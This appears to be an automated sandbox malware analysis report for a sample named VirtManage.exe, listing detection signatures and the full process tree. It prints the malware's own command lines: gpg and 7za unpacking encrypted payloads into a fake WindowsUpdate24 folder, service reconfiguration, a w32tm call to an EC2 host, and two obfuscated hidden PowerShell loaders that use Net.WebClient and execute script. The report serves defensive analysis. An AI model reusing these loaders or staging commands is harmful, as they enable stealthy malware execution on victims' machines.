Edit tour
Windows
Analysis Report
VirtManage.exe
Overview
General Information
| Sample name: | VirtManage.exe |
| Analysis ID: | 1632487 |
| MD5: | b587a6af7fd86eeb42425913b8d73d47 |
| SHA1: | ad388fa1cc0bec1fc45b30a460c53c56789bb11d |
| SHA256: | c600dd34854aa5c6c97ed8c1c92d28034d661652b4d892d223b6805a4e864622 |
| Tags: | exeFORTUNEPRINTCENTRELIMITEDuser-SquiblydooBlog |
| Infos: |  |
 | |
Detection
| Score: | 42 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Compliance
| Score: | 33 |
| Range: | 0 - 100 |
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
.NET source code contains a domain name check
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
VirtManage.exe (PID: 3452 cmdline: "C:\Users\ user\Deskt op\VirtMan age.exe" MD5: B587A6AF7FD86EEB42425913B8D73D47) 
gpg.exe (PID: 5784 cmdline: C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\too ls.7z --de crypt C:\P rogramData \Microsoft \WindowsUp date24\5FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) 
conhost.exe (PID: 3056 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - gpg.exe (PID: 5520 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\7za .dll --dec rypt C:\Pr ogramData\ Microsoft\ WindowsUpd ate24\1FIL E.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 6960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - gpg.exe (PID: 2976 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\7za .exe --dec rypt C:\Pr ogramData\ Microsoft\ WindowsUpd ate24\2FIL E.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 5804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
7za.exe (PID: 5632 cmdline: C:\Program Data\Micro soft\Windo wsUpdate24 \7za x C:\ ProgramDat a\Microsof t\WindowsU pdate24\to ols.7z -pJ erx#sdqWE4 5 -oC:\Pro gramData\M icrosoft\W indowsUpda te24 MD5: C58A4193BAC738B1A88ACAD9C6A57356) - conhost.exe (PID: 2216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
msiexec.exe (PID: 3056 cmdline: msiexec.ex e /i "C:\P rogramData \Microsoft \WindowsUp date24\RVT ools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF) - gpg.exe (PID: 5784 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\Cer t.txt --de crypt C:\P rogramData \Microsoft \WindowsUp date24\3FI LE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 7084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - w32tm.exe (PID: 6956 cmdline:
w32tm /mon itor /comp uters:ec2- 52-14-160- 176.us-eas t-2.comput e.amazonaw s.com MD5: E55B6A057FDDD35A7380FB2C6811A8EC) - conhost.exe (PID: 5704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - w32tm.exe (PID: 7208 cmdline:
w32tm /mon itor /comp uters:ec2- 52-14-160- 176.us-eas t-2.comput e.amazonaw s.com MD5: 81A82132737224D324A3E8DA993E2FB5) - gpg.exe (PID: 7288 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \gpg.exe - -passphras e "1234567 8" --batch --yes --o utput C:\P rogramData \Microsoft \WindowsUp date24\Upd ateFull.7z --decrypt C:\Progra mData\Micr osoft\Wind owsUpdate2 4\4FILE.1A .gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756) - conhost.exe (PID: 7296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 7za.exe (PID: 7352 cmdline:
C:\Program Data\Micro soft\Windo wsUpdate24 \7za x C:\ ProgramDat a\Microsof t\WindowsU pdate24\Up dateFull.7 z -pTG98HJ erxsdqWE45 -oC:\Prog ramData\Mi crosoft\Wi ndowsUpdat e24 MD5: C58A4193BAC738B1A88ACAD9C6A57356) - conhost.exe (PID: 7360 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 7960 cmdline:
sc config msdtc star t= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 8012 cmdline:
sc config msdtc obj= "LocalSys tem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - conhost.exe (PID: 8020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
oleview.exe (PID: 8164 cmdline: C:\Program Data\Micro soft\Windo wsUpdate24 \oleview.e xe MD5: ADB9B72679B88DDE1749E0A438222156) 
powershell.exe (PID: 8184 cmdline: powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:/E $('C:\Prog ra'+'mData \Mic'+'ros oft\Wind'+ 'owsUpdate 24\kau'+'t ix2ae'+'X. t');popd;S et-Variabl e X (.(Ite m Variable :*xec*t).V alue.Invok eCommand.( ((Item Var iable:*xec *t).Value. InvokeComm and|Get-Me mber|Where -Object{(L S Variable :\_).Value .Name-like '*mma*d'}) .Name).Inv oke((Item Variable:* xec*t).Val ue.InvokeC ommand.((( Item Varia ble:*xec*t ).Value.In vokeComman d|Get-Memb er|Where-O bject{(LS Variable:\ _).Value.N ame-like'* dName'}).N ame).Invok e('*w-*ct' ,1,1),[Man agement.Au tomation.C ommandType s]::Cmdlet )Net.WebCl ient);(Get -ChildItem Variable: \X).Value. ((((Get-Ch ildItem Va riable:\X) .Value|Get -Member)|W here-Objec t{(LS Vari able:\_).V alue.Name- like'*nl*g '}).Name). Invoke((GC I Variable :\E).Value )|.( ([Str ing]''.Nor malize)[77 ,35,46]-Jo in'')" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - csc.exe (PID: 1192 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\r5i403 kd\r5i403k d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 7604 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESEA2F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\r5i 403kd\CSC3 84ED8B1DBB 445E685393 158270EAB0 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - whoami.exe (PID: 6928 cmdline:
"C:\Window s\system32 \whoami.ex e" MD5: A4A6924F3EAF97981323703D38FD99C4)
- msiexec.exe (PID: 5668 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 5608 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng B61671E C3A9141499 D2D4B948D7 A1ADD C MD5: 9D09DC1EDA745A5F87553048E57620CF) 
WmiPrvSE.exe (PID: 8080 cmdline: C:\Windows \sysWOW64\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
- oleview.exe (PID: 2444 cmdline:
"C:\Progra mData\Micr osoft\LogU pdateWindo ws\oleview .exe" MD5: ADB9B72679B88DDE1749E0A438222156) - powershell.exe (PID: 6956 cmdline:
powershell .exe -wind owstyle Hi dden -comm and "SI Va riable:/gO $('C:\Pro '+'gramDat a\Mic'+'ro so'+'ft\Lo gUp'+'date Wi'+'ndows \Wiaph'+'o h7um.t');S et-Item Va riable:/fH 'Net.WebC lient';dir ect*;SV B O (.$Execu tionContex t.(($Execu tionContex t|GM)[6].N ame).(($Ex ecutionCon text.(($Ex ecutionCon text|GM)[6 ].Name).Ps Object.Met hods|Where {(Get-Chil dItem Vari able:\_).V alue.Name- like'*dl*t s'}).Name) .Invoke('N e*ct')(Var iable fH - Value));SI Variable: 2Rn ((((Ge t-ChildIte m Variable :/BO).Valu e|GM)|Wher e{(Get-Chi ldItem Var iable:\_). Value.Name -like'*nl* g'}).Name) ;Invoke-Co mmand(($Ex ecutionCon text|ForEa ch{(Get-Ch ildItem Va riable:\_) .Value.(($ ExecutionC ontext|GM) [6].Name)| ForEach{(G CI Variabl e:\_).Valu e.NewScrip tBlock((Ge t-ChildIte m Variable :/BO).Valu e.((Item V ariable:/2 Rn).Value) .Invoke((G I Variable :/gO).Valu e))}}))" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
⊘No yara matches
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): | ||
| Source: | Author: Perez Diego (@darkquassar), oscd.community: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||